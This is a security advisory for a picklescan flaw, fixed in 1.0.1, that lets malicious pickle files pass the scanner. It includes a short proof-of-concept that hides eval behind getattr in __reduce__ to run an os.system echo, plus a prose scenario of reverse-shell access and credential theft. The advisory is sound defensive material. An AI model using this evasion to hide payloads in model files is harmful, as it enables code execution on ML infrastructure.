picklescan — a tool widely deployed to gate ML model loading from untrusted sources — can be bypassed with a public one-liner that uses getattr obfuscation to hide eval calls. Any MLOps pipeline or model-serving infrastructure that relies on picklescan as a security control is effectively unprotected against malicious pickle artifacts. Upgrade to picklescan >= 1.0.1 immediately and treat all pickle files previously cleared by older versions from external sources as potentially compromised.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 1.0.1 | 1.0.1 |
If picklescan (any version below 1.0.1) sits anywhere in your model-loading path, you are affected.
Severity & Risk
Recommended Action
1. PATCH: Upgrade picklescan to >= 1.0.1 immediately (`pip install --upgrade picklescan`).
2. AUDIT: Re-scan all pickle files from external sources that were previously approved by picklescan < 1.0.1; treat them as untrusted until re-verified.
3. SAFE FORMATS: Prefer safetensors, ONNX, or JSON over pickle for model serialization wherever possible to eliminate the attack surface entirely.
4. SANDBOXING: Load any pickle files in isolated containers with no network egress, minimal filesystem access, and resource limits, even after scanning.
5. DETECTION: Monitor for unexpected child process spawning (`os.system`, `subprocess`) from Python processes involved in model loading.
6. DEFENSE IN DEPTH: Do not rely solely on any single scanner; combine hash verification, code signing, and allowlisting for model artifacts from external registries.
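The hash-verification step can be sketched as follows. This is a minimal illustration, assuming a hypothetical `APPROVED_DIGESTS` allowlist that would in practice be populated from a signed manifest; the artifact name and digest shown are placeholders.

```python
import hashlib

# Hypothetical allowlist mapping artifact names to vetted SHA-256 digests;
# in a real deployment this would come from a signed, access-controlled manifest.
APPROVED_DIGESTS = {
    "model.pkl": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}

def sha256_of(path):
    """Stream the file in chunks so large model artifacts need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_artifact(path, name):
    """Refuse to hand the file to any loader unless its digest is allowlisted."""
    actual = sha256_of(path)
    if actual != APPROVED_DIGESTS.get(name):
        raise ValueError(f"{name}: digest {actual} not on allowlist; refusing to load")
    return actual
```

Verification happens before the artifact ever reaches `pickle.load`, so a scanner bypass alone is not enough; the attacker would also need to get a tampered file onto the allowlist.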
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
### Summary

An unsafe deserialization vulnerability allows an unauthenticated attacker to execute arbitrary code on any host that loads a pickle payload from an untrusted source.

### Details

It is possible to hide the `eval` call by nesting it under another callable via `getattr`, so the scanner never sees a direct reference to `eval`.

### PoC

```python
import builtins

class EvilClass:
    @staticmethod
    def _obfuscated_eval(payload):
        getattr(builtins, "eval")(payload)

    def __reduce__(self):
        payload = "__import__('os').system('echo \"successful attack\"')"
        return self._obfuscated_eval, (payload,)
```

### Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files from untrusted sources.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by the scanner but executes when the file is loaded.

Supply chain attack: Attackers can distribute infected pickle files to systems that load serialized ML models, APIs, or saved Python objects from untrusted sources.
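To make the mechanics concrete without running anything harmful, here is a sketch using a benign analogue of the PoC. The class and method names (`HiddenCall`, `_indirect_call`) are hypothetical, and the payload is harmless arithmetic rather than `os.system`; the point is that the pickle opcode stream references only the wrapper, never `eval` itself, yet `eval` still runs at load time.

```python
import builtins
import pickle
import pickletools

class HiddenCall:
    """Benign analogue of the PoC: eval is reached only through getattr,
    so the pickle stream names this wrapper rather than builtins.eval."""

    @staticmethod
    def _indirect_call(expr):
        # The getattr lookup hides any direct reference to eval.
        return getattr(builtins, "eval")(expr)

    def __reduce__(self):
        # Harmless arithmetic instead of the advisory's os.system payload.
        return self._indirect_call, ("21 * 2",)

blob = pickle.dumps(HiddenCall())

# No string argument in the opcode stream mentions eval...
strings = [arg for _, arg, _ in pickletools.genops(blob) if isinstance(arg, str)]
assert all("eval" not in s for s in strings)

# ...yet the wrapped eval runs the moment the blob is loaded.
print(pickle.loads(blob))  # 42
```

A naive scanner that looks for dangerous globals such as `eval` or `os.system` in the opcode stream sees only an innocuous-looking module-level callable, which is exactly the blind spot the patched picklescan closes.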
Exploitation Scenario
An adversary targets an MLOps platform that automatically pulls and benchmarks community-submitted models. They craft a malicious pickle file embedding a reverse shell via getattr obfuscation — the file passes picklescan inspection cleanly on pre-patch versions. The file is published to a public model hub or submitted as a model artifact via a pull request. When the automated evaluation pipeline loads the model for scoring, the payload executes with the privileges of the inference worker. The adversary gains shell access to the training infrastructure, from which they can exfiltrate training data, poison the model registry, harvest cloud credentials from environment variables, or persist access. No human interaction is required after initial artifact submission.